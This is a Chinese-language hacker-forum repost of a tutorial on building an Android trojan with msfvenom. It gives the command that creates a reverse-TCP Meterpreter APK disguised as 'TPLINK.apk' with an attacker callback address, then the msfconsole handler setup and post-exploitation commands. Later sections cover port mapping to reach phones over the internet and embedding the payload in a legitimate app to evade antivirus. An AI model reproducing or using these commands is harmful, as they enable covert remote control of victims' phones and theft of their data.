游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

普通版

在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下：

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > TPLINK.apk

这样便生成了一个名为 TPLINK.apk的Android木马。

然后我们配合 msfcosole进行攻击即可。

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LPORT 5555
exploit

手机端安装并执行，成功获得shell。

一些另外的玩法

给手机播放视频和音频文件（需更新到最新版的msf）

命令格式： paly /root/xxx.mp3 mp4

修改手机壁纸

background
use post/multi/manage/set_wallpaper
sessions
set sessions id
set WALLPAPER_FILE JPG
exploit

晋级玩法

利用 armitage图形化管理工具

可视化的文件管理

骨灰级

外网木马

我们可以利用花生壳进行端口映射完成外网木马的渗透测试，添加端口如下！

然后在kali中设置花生壳的端口和ip地址即可。
那么！你还有那些另类的玩法呢？一起在下方交流吧。

木马免杀

对于以上的木马，是无法通过杀毒软件的查杀的，我们可以将 payload加入到正常的APP中，来起来免杀的效果。
命令:

msfvenom -p -x test.apk android/meterpreter/reverse_tcp LHOST=192.168.232.195 LPORT=5555 R > kali.apk

命令详解:
-x: 后跟原生态app
生成的kali.apk为新的木马文件。

视频演示

版权属于：逍遥子大表哥

本文链接：https://blog.bbskali.cn/524.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可，转载引用文章应遵循相同协议。

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

kali下androidshell那些事

精选回复

普通版